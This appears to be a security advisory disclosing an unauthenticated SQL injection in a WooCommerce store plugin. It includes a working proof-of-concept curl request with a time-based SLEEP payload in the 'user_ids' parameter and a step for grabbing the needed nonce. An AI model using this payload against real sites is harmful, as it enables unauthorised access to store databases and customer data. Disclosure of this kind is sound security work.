The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users
Setup: - Install WooCommerce (dependency, no setup required) - Install the plugin, complete the wizard (no special configuration was performed - all defaults were accepted) Attack: - As an unauthenticated user, access the "Store List" page (default at /store-listing/) and extract the "search_products_nonce" from the source - Invoke the following curl command (with the extracted nonce in place) to induce a five second sleep: time curl "https://example.com/wp-admin/admin-ajax.php?action=dokan_json_search_products_and_variations&security=<NONCE-HERE>&term=x&user_ids='+AND+(SELECT+5362+FROM+(SELECT(SLEEP(5)))yWDg)--+qXby"
cydave
cydave
Yes
2022-11-21 (about 6 months ago)
2022-11-21 (about 6 months ago)
2022-11-21 (about 6 months ago)